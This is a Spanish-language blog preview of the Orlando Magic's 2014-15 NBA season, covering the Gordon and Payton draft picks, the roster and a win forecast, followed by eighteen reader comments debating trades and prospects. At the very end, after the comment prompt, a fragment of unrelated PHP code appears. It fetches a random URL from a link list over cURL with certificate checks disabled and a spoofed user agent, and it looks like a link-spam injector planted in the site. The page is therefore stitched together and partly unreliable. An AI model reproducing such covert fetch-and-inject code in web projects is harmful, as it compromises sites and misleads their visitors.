Orlando Magic 2014-2015: Al salir de clase

27 de October de 2014 por Viva_Dirk

Pocas cosas positivas podemos decir de la pasada campaña de los Magic, en la que un balance de 23-59 les dejó como el tercer peor equipo de la liga. Lo mejor de largo fue la temporada rookie de Victor Oladipo, que disputó 80 partidos con unos promedios de 14-4-4, algo que nos hace pensar en un jugador de nivel All Star en el medio plazo. De la pareja Tobias Harris y Nikola Vucevic se espera algo más: del primero, una evolución grande, sobre todo en el apartado anotador, y del segundo, que sus números tengan algo más de influencia en el juego, y de ambos que puedan mantenerse sanos con regularidad. La última nota positiva fue Kyle O’Quinn, que en pocos minutos de juego mostró una gran efectividad. Del resto, prácticamente nada que rescatar. Afflalo, que fue el máximo anotador, ya no está, como tampoco Jameer Nelson después de un buen número de años al servicio de la franquicia. Estas ausencias serán cubiertas por dos jóvenes proyectos de estrellas, Aaron Gordon y Elfrid Payton, y como suele suceder cuando se marchan jugadores contrastados y llegan jóvenes a los que dar oportunidades, el objetivo de los Magic esta temporada tendrá poco que ver con ganar partidos.

Aaron Gordon y Elfrid Payton

Movimientos clave

Los Magic afrontaban el verano con dos elecciones altas en unos de los mejores drafts de los últimos 25 años según los expertos. Con el pick 4 eligieron, con cierta sorpresa, a Aaron Gordon, y vía traspaso con el pick 12 se hicieron con Elfrid Payton; ambas elecciones me parecen extremadamente acertadas, y digo extremadamente porque habría sido sencillo en el pick 4 decantarse por jugadores como Smart, Randle o Exum, y después ir a por un consumado anotador como McDermott, pero en su lugar se quedaron con dos jugadores que fácilmente -repito, fácilmente- pueden ser las nuevas y mejoradas versiones de Blake Griffin y John Wall. El resto de movimientos han sido menores: la llegada de jugadores como Ridnour, Ben Gordon o Channing Frye no deberían ser obstaculo para que los jóvenes tengan minutos. En el traspaso de Afflalo llegó Evan Fournier, otro joven con talento que debe demostrar si puede hacerse un hueco en la liga. Finalmente hay otros tres rookies en el roster actual entre los que destaca Devyn Marble como anotador universitario.

Qué esperamos de ellos

El núcleo formado por Payton-Oladipo-Harris-Gordon-Vucevic tiene una media de edad que no llega a los 22 años, así que lo único que esperamos de ellos es que nos dejen ver cuáles de ellos pueden ser grandes jugadores y cuáles no. Ya he dejado ver mi amor por Gordon y Payton, así que espero verlos muchos minutos en la pista, junto a Oladipo cuando se recupere en lo que debe ser la base del futuro de los Magic junto a Vucevic, que ya es un jugador contrastado, y un Tobias Harris al que tenemos ganas de ver sano. Después de ver a estos, también esperamos buenas oportunidades para los O’Quinn, Fournier, Harkless y Nicholson. Para acabar, veremos un buen puñado de minutos a veteranos en busca de otros objetivos distintos a los de los jóvenes, sea llamar la atención de un aspirante al título, sea firmar un mejor contrato en su próxima oportunidad. En este grupo están Ridnour, Frye, Gordon y Green.

Pronóstico

Entre 20 y 25 victorias, con Elfrid Payton luchando por el ROY.

Plantilla

PG: Elfrid Payton, Luke Ridnour
SG: Victor Oladipo, Evan Fournier, Ben Gordon, Devyn Marble, Willie Green
SF: Tobias Harris, Maurice Harkless
PF: Aaron Gordon, Channing Frye, Andrew Nicholson, Kyle O’Quinn
C: Nikola Vucevic, Dewayne Dedmon

Comenta

18 comentarios a esta entrada

  1. Ruxixon dice:
    #1

    Otra cosa no,pero siempre apuestas fuerte Viva_Dirk.Decir que serán las versiones mejoradas de Griffin y Wall es decir mucho,yo casi me conformaría con que este año ocupen un rol clave en el equipo,cosa que parece cumplirán.De momento Payton puede ser el catalizador de ese juego coral que presumiblemente veamos en Orlando,y con Aaron Gordon van a subir muchos peldaños la defensa de este equipo.Una pena que entre el trio de perros de presa que pueden formar Payton,Oladipo y Harkless/Aaron Gordon no haya un especialista en el tiro exterior pero para eso Vaughn puede jugar mucho con el quinteto.Por cierto,bajo mi punto de vista este año es el que marca el destino de Vaughn como entrenador jefe en los Magic.

    Muchas ganas de ver a Tobias,uno de mis jugadores fetiche.No ha acordado la extensión de contrato así que será agente libre restringido.A ver si las lesiones (una pena que para abrir boca se caigan 2 titulares como Dipo y Frye) no le hacen la jugarreta.Venga,me he contagiado…creo que Orlando puede ser el Phoenix Suns -outsider de la temporada pasada- este año.

      Citar

  2. Denise dice:
    #2

    Pues yo estoy profundamente desilusionado con este equipo. No quiero putear a los 4 vientos a Rob Hennigan porque el tipo, bien sea por suerte ó por calidad suya a la hora de decidir, al final ha ido acertando en contra de los pronósticos (trade de Howard, de Redick y elección de Oladipo), pero esta vez creo que ha tomado decisiones erróneas.

    El verano comenzó con el chistoso traspaso de Afflalo, por números, Top 3 el pasado año en la posición de escolta a cambio de Evan Fournier y un pick 56!!. Pero quién es Fournier??? Eso no es una marca de cartas de póker y naipes?? Este traspaso me parece una verguenza, Afflalo era una grandisima moneda de cambio que podía haber servido como explicaré mas adelante para pillar otro pick en el Draft, y me lo cambias por un jugador residual. El francés juega por debajo del aro, y de ese modo, solo puedes mantenerte en la NBA si eres un grandisimo y talentoso tirador-anotador, ó un gran pasador. Pues bien, Fournier no es nada de esto, ni siquiera sé cual es su especialidad, porque ni anota, ni rebotea, ni asiste, ni defiende. En definitiva, un jugador que en 5 años estará jugando en el Fuenlabrada.

    Después llega el pick 4, aún no me puedo creer que se dejará escapar a un talento de la naturaleza como Dante Exum. De ese error nos acordaremos eternamente y lo vamos a pagar muy caro, Hennigan se lo debería tatuar en el culo en un futuro. El australiano está un pelín verde, sí, pero el talento se le ve a raudales y se ve a leguas que en 3 años se convertirá en un perenne All-Star para la próxima decada. Pues eligen a Aaron Gordon….La comparación con Blake Griffin será solo por sus mates, porque este chaval es un bluff. Griffin en su año anterior a la NBA se marcó un 22-14, mientras este Gordon tio no tiene ni un solo recurso ofensivo, una autentico bust cuyas únicas virtudes son una tremenda planta y una capacidad atlética genial que el hace jugar facilmente por encima del aro. Sólo a base de mates y rebotes, será un perenne Mr Doble-Doble en los años venideros, pero no puedes desperdiciar el pick 4 de uno de los mejores Drafts de los últimos años en este muchacho. Chavales atleticos así salen todos los años.

    Y ahora viene lo que quería comentar con Afflalo. Hennigan dijo que Gordon era su hombre y que querían ir a por él. Si Orlando no lo elige, ni Utah, ni Boston ni LA lo hubiesen elegido, este chaval hubiese caido al pick 8 ó 9, imaginaos que lo elige Sacramento ó Charlotte, pues macho, tenías a Afflalo, estoy seguro que si le ofreces a estas 2 franquicias Afflalo + Nicholson por Aaron Gordon te lo dan. Y si no, a unas malas si tan convencido estás de que Gordon va a ser un crack, se le puede dar una ronda futura.

    Después eligen a Saric, y le dan a Philadelphia el croata más una primera ronda por Payton. Buff, esa primera ronda se echará de menos en el futuro. Creo que se podría haber manejado mejor ese traspaso sin necesidad de incluir esa ronda. Otro error. El cambio de jugadores en sí, si me parece correcto, me gusta más Payton que Saric. Si bien el base es manco y no mete una a más de 5 metros en una piscina, tiene una clase brutal, dirige y asiste bien y tiene descaro sobre todo a la hora de penetrar. Me ha gustado mucho en pretemporada, para el futuro no creo que pueda ser una estrella, pero si lo veo como un base titular en la próxima década en cualquier franquicia.

    Y después llega una de las mayores cagadas de la NBA en todo el verano, el fichaje de Channing Frye. No sé si lo fichan por ser el primo de Tobias Harris y hacer que este renueve ó por trollear a los fans. Pero su fichaje no se entiende. Está muy bonito tener un 4 abierto que tire triples, más aun en este equipo tan carente de tiro exterior. Pero chico…, te gastas 32 millnazos hipotecando parte del cuadro salarial en los próximos 4 años en este muchacho con problemas de corazón que encima te viene a ocupar la posición mejor cubierta en calidad y profundidad como es el PF donde ya estaban Harris, Gordon, Nicholson y O’Quinn. Además, su fichaje condena a Tobias Harris a jugar de alero, sitio donde queda desaprovechadisimo ya que su tiro exterior no es fiable y los rivales se lo van a zumbar en velocidad lateral. Cuántas mandarinas de Harris nos tocará ver este año debido al cambio de posición!!!
    En lugar de Frye, era mejor haberse gastado la pasta en un alero. Quizás hubiese sido mejor sobrepagar a Chandler Parsons que siendo de Florida y viendose como la estrella del equipo, quizás no le hubiese importado venirse aquí a ejercer de jugador franquicia.

    Del resto de fichajes, ni Ridnour, ni Ben Gordon ni Willie Green motivan lo más mínimo. Lo único bueno es que todos tienen Team Option el año que vienen y lo más probable es que acaben fuera del equipo.

    Por último, quisiera destacar la pésima labor de Jacque Vaughn, vete ya por favor!!. Ojala esto empiece con un 0-10 y sirva para largar a este pseudo-entrenador que no define roles, no hace ni un sistema en condiciones, el equipo no juega a nada, no tiene capacidad de reacción ni innovación y tiene a los jugadores mareados jugando minutos como una montaña rusa, preguntenle al crack de Harkless, me encanta este jugador y este año es crucial para él, pero teniendo al patán de entrenador que tenemos, seguramente cuando salga de Orlando vaya a alguna franquicia y explote.

    En definitiva, poco o nada tengo gana de ver a este equipo y lo que lo haga creo que será en diferido pues no tengo ganas de perder horas de sueño viendo semejante bochorno. Menos de 25 victorias, y el próximo verano, otro Top 5 del Draft y nuevas cagadas tanto en la elección del pick como en los fichajes, nos esperan.

      Citar

  3. Denise dice:
    #3

    Ruxixon:

    Muchas ganas de ver a Tobias,uno de mis jugadores fetiche.No ha acordado la extensión de contrato así que será agente libre restringido.A ver si las lesiones (una pena que para abrir boca se caigan 2 titulares como Dipo y Frye) no le hacen la jugarreta.Venga,me he contagiado…creo que Orlando puede ser el Phoenix Suns -outsider de la temporada pasada- este año.

    Respecto a Tobias, en principio iba a renovar, pero Nike se ha metido de por medio ofreciendole un bonus en su salario si ficha por un gran mercado (Lakers, Clippers, Chicago, NY). Es una verguenza como este tipo de marcas comerciales cada vez tienen más importancia hasta el punto de decidir el futuro de un jugador. Creo que Adam Silver y la NBA debería mirarse esto y empezar a prohibirlo de alguna manera, aunque claro, el dinero llama al dinero.

    A mi me encanta y me encantaría que lo renovasen, pero si se va a subir a la parra ó se quiera pirar, ahí esta la puerta, desagradecido. Lo que deberían hacer los Magic es hablar ya con él, y si ven que no está dispuesto a renovar, traspasarlo por un tirador.

    No se ha comentado, Vucevic si renovó cuatro años por 53 millones. Creo que es un precio justo.

      Citar

  4. Azabel dice:
    #4

    Muchos millones para vucevic, es cierto q hace unos numerasos, pero yo no doy un contrato asi a ningun jugador q haya jugado siempre en un equipo perdedor, me da q cualquiera se lleva un contratazo sin importar i su equipo gana o no

      Citar

  5. TheDeerHunter dice:
    #5

    Madre mía, los nuevos Griffin y Wall nada menos. Esas palabras son jugosas para cuando revisemos los pronósticos…
    Ante la duda delego mi opinión sobre los Magic en Denise, aunque quizá lo veo excesivamente pesimista.
    Hay ganas de ver a los nuevos.

      Citar

  6. arivas dice:
    #6

    Pues como decis a ver a los jovenes y su progresion.

    que equipo de estos jovenes os gusta mas? Magic, Wolves, Bucks, sixers. Jazz? Para este año, pero principalmente de cara a proximos años?

      Citar

  7. Denise dice:
    #7

    arivas:
    Pues como decis a ver a los jovenes y su progresion.

    que equipo de estos jovenes os gusta mas? Magic, Wolves, Bucks, sixers. Jazz? Para este año, pero principalmente de cara a proximos años?

    Para mi, claramente la de los Jazz. Trey Burke (mejor jugador del Draft 2013 a mi gusto), Dante Exum, Alec Burks, Gordon Hayward, Rodney Hood, Enes Kanter, Rudy Gobert (proximo Center dominante) todo ello unido a Derrick Favors. Cualquier seguidor de los Jazz debería estar en estos momentos sumamente excitado.
    Personalmente, aunque Hayward y Kanter sean buenos, serían mis monedas de cambio para traer por ellos a una megaestrella de la liga, lo que pasa que no sé si alguna megaestrella querría recalar en Utah.

      Citar

  8. Denise dice:
    #8

    TheDeerHunter:

    Ante la duda delego mi opinión sobre los Magic en Denise, aunque quizá lo veo excesivamente pesimista.
    Hay ganas de ver a los nuevos.

    Si.,bueno..quizás estoy demasiado pesimista y estoy dando palos sin antes darle una oportunidad al equipo y a ciertos jugadores. Pero tengo la sensación de que el fichaje de Frye es nefasto, lo que se recibió por Afflalo fue un timo, y en el Draft se debio apostar por la calidad y el talento (de Exum ó Smart) antes que por el atleticismo de Gordon, porque bicharracos atleticos y saltarines hay muchos, salen cada año debajo de las piedras y es mas facil de encontrar que tios con talento para crearse su propio tiro y generar con su talento juego y ventajas.

      Citar

  9. Jose Luis dice:
    #9

    a mi lo de Frye y Afflalo aún no me entra en la cabeza xD

    Y en el draft… pf no sé, Randle me parece muy bueno, Smart también, Exum me parece verde… y el Gordon este, le he visto 2-3 partidos pero a mi no me convencen como pick4. Peyton parece buen material.

      Citar

  10. Ruxixon dice:
    #10

    Opino lo mismo que Denise respecto al equipo de más futuro,y de entre toda esa variedad de motivos para creer que tienen los seguidores de Utah no me olvidaría del soplo de aire fresco que supone la llegada de Snyder a su banquillo.Por el lado contrario tanto 76ers como Wolves me parece que les falta mucho para acabar de definir sus proyectos.Philadephia tiene buen material de partida,pero les falta añadir talento a su línea exterior,y en el próximo draft tampoco hay ese proyecto de jugador que lo vaya a romper.Luego que hay que probar a gente de cristal como Noel,MCW y Embiid.Por otra parte en Minnesota me parece que falta mucho para rematar ese proyecto,sobrando muchísima gente para este nuevo ciclo que se puede abrir con Wiggins,principalmente jugadores como Kevin Martin y Pekovic no se saben si van o vienen,lo mismo que Saunders.

    @denise: No sabía lo de NIke sobre Harris,un tanto lamentable que las grandes marcas ejerzan esa presión.De todas formas espero que lo que busque Harris es maximizar el dinero que recibirá en su próximo contrato confiando al máximo en partirlo este año,priorizando el quedarse en Orlando.No sé,por fotos y tal creo que el tio está comprometido con la organización a pesar de este desencuentro a la hora de firmar la extensión.

      Citar

  11. Nacho dice:
    #11

    @Denise
    Lo de Gobert es nuevo, no? jejejeje
    Deberías cambiarte el nombre, jajaja.
    No lo he visto en la NBA, pero en Fiba le he visto varios partidos, tiene pinta, está muy verde, obvio, pero dominante… ostias, a esa edad, con menos cuerpo, un tal Pau si era dominante. Gobert, será un buen jugador, incluso muy bueno, pero dominante, con los bicharracos que hay con su edad, ni de coña. (ahora vendrán los hados a dar por… a mis pronósticos) Recordad que yo soy el que vota por un tenista marihuanero para mejor defensor y aun senegalés ledionado como mejor rookie, jejej

      Citar

  12. Nacho dice:
    #12

    A la pregunta del disfrazado Esteban…, no se si por buscar lugares recónditos o por pasión Ricky (lo confieso) yo apuesto a Bucks y Wolves. Lo que hay que ver es si duran esos jóvenes juntos. Y ahí me fío más de los del ciervo, y es que tener a un entrenador que tiene novias espectaculares debe motivar.

      Citar

  13. Denise dice:
    #13

    Nacho:
    @Denise
    Lo de Gobert es nuevo, no? jejejeje
    Deberías cambiarte el nombre, jajaja.
    No lo he visto en la NBA, pero en Fiba le he visto varios partidos, tiene pinta, está muy verde, obvio, pero dominante… ostias, a esa edad, con menos cuerpo, un tal Pau si era dominante. Gobert, será un buen jugador, incluso muy bueno, pero dominante, con los bicharracos que hay con su edad, ni de coña. (ahora vendrán los hados a dar por… a mis pronósticos) Recordad que yo soy el que vota por un tenista marihuanero para mejor defensor y aun senegalés ledionado como mejor rookie, jejej

    Lo de Gobert no es nuevo, lo defiendo desde antes del Draft ’13, y ya me pareció el robazo de ese Draft como así lo manifesté aquí. Quizás dominante no es la palabra que quiero decir, porque dominante son gente como O’Neal ó incluso un par de temporadas de Howard y no es ese el nivel al que me refiero. Lo que quiero decir es que lo veo como un Top 5 de Centers en los proximos 2 años, pudiendo promediar con la gorra 14-12-3 y optando a titulos como Mejor Defensor, Maximo Reboteador ó Taponador. Obviamente en ataque no tiene movimientos y está limitado, pero a base de picks and rolls y puntos tras rebotes ofensivos puede consolidar una gran carrera. En definitiva, un tio que por su atleticismo, coordinación e intimidación sería una pieza fundamental como center titular para que cualquier franquicia gane un anillo.

    @Ruxixon. Sí, lo de Nike con Tobias Harris lo destapó un tal Chris Broussard de la ESPN, y es una verguenza que empiece a suceder esto y las grandes marcas comerciales esten por encima de los equipos. Y más triste aún es que si esto lo hace con un jugador de nivel digamos medio como Tobias, qué no harán proximamente con los Durant, Lebron, Anthony Davis, etc…

      Citar

  14. Viva_Dirk dice:
    #14

    Denise, Blake Griffin hizo en su primer año de universidad 14-9, Aaron Gordon ha hecho 12-8 y eso que sus primeros partidos fueron muy malos. Más allá de eso, Gordon es un jugador con buena visión de juego, un gran sentido colectivo, gran defensor y con buena mano. Su peor defecto son de largo los tiros libres, algo que con la ética de trabajo que ha demostrado solucionara decentemente. Es difícil que llegue a las cotas anotadoras de Griffin, pero en todo lo demás puede ser igual o mejor.

    Payton es otra cosa, no creo que llegue a desarrollar un buen tiro de media y larga distancia, pero con la capacidad de penetrar, el cambio de ritmo, la visión de juego y lo muchísimoque aporta en todas las demás facetas va a ser una pasada de jugador.

    Exum no había demostrado naaaaada, y está verde a más no poder. No lo habría elegido por delante de ninguno de los 2, en este draft como muy alto lo habría elegido pick8.

      Citar

  15. Denise dice:
    #15

    Viva_Dirk:
    Denise, Blake Griffin hizo en su primer año de universidad 14-9, Aaron Gordon ha hecho 12-8 y eso que sus primeros partidos fueron muy malos. Más allá de eso, Gordon es un jugador con buena visión de juego, un gran sentido colectivo, gran defensor y con buena mano. Su peor defecto son de largo los tiros libres, algo que con la ética de trabajo que ha demostrado solucionara decentemente. Es difícil que llegue a las cotas anotadoras de Griffin, pero en todo lo demás puede ser igual o mejor.

    Payton es otra cosa, no creo que llegue a desarrollar un buen tiro de media y larga distancia, pero con la capacidad de penetrar, el cambio de ritmo, la visión de juego y lo muchísimoque aporta en todas las demás facetas va a ser una pasada de jugador.

    Exum no había demostrado naaaaada, y está verde a más no poder. No lo habría elegido por delante de ninguno de los 2, en este draft como muy alto lo habría elegido pick8.

    Ok, ojala aciertes. Creo que todos te lo reconoceriamos porque desde luego es bastante arriesgada y personal tu apuesta.

    Respecto a Gordon, la buena mano yo no se la he visto, en ataque aun no tiene movimientos y con bastante frecuencia tira mandarinas en posturas raras y como desequilibrado ó con muy poca coordinación. Sí es verdad que lo que debería aspirar y en quien debe mirarse en el espejo es en Blake Griffin, su juego por encima del aro puede ser similar, aunque no creo que consiga el potencial ofensivo del de Clippers ni mucho menos la jerarquía de jugador franquicia.

    Lo de tu comparativa de Payton con John Wall, salvo en la velocidad al contraataque, no veo que se parezcan mucho. Quizás diría que Payton es más un Rajon Rondo por aquello de que ambos son pésimos tiradores, pero penetran y dirigen bastante bien. Ha perdido muuuchas bolas Payton en preseason, pero imagino que irá limando esta faceta con el paso del tiempo.

      Citar

  16. Azabel dice:
    #16

    Nacho: r buscar lugares recónditos o por pasión Ricky

    perdona pero yo soy Azabel no arivas o como se llame el que hizo esa pregunta jajaja

      Citar

  17. Luis Hernández dice:
    #17

    Suscribo en general tanto comentarios positivos como negativos. A Gordon lo que le falta, básicamente, son un par de años más en Arizona aprendiendo fundamentos. Ofensivamente marca pocas diferencias y eso a un número 4 del draft hay que pedírselo. Ojo, a lo mejor lo desarrolla este año, pero debería venir “de fábrica”. Tiene una ventaja lo de Peyton, liberar a Oladipo para que juegue de 2, su mejor posición y donde seguramente marque diferencias. Yo creo que Frye va a jugar poquito y entre Harris y O’Quinn se dividirán la posición, igual que Harkless y Nicholson en la de 3. Un año para probar y para ir dando galones

      Citar

  18. Nacho dice:
    #18

    Sorry Esteban, leí rapido. Me pareció una típica pregunta tuya, e interesante, como siempre.
    Denise, era irónica mi pregunta, porque ya sé que has hablado mucho, y bien, de Gobert, y es evidente que te gusta.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>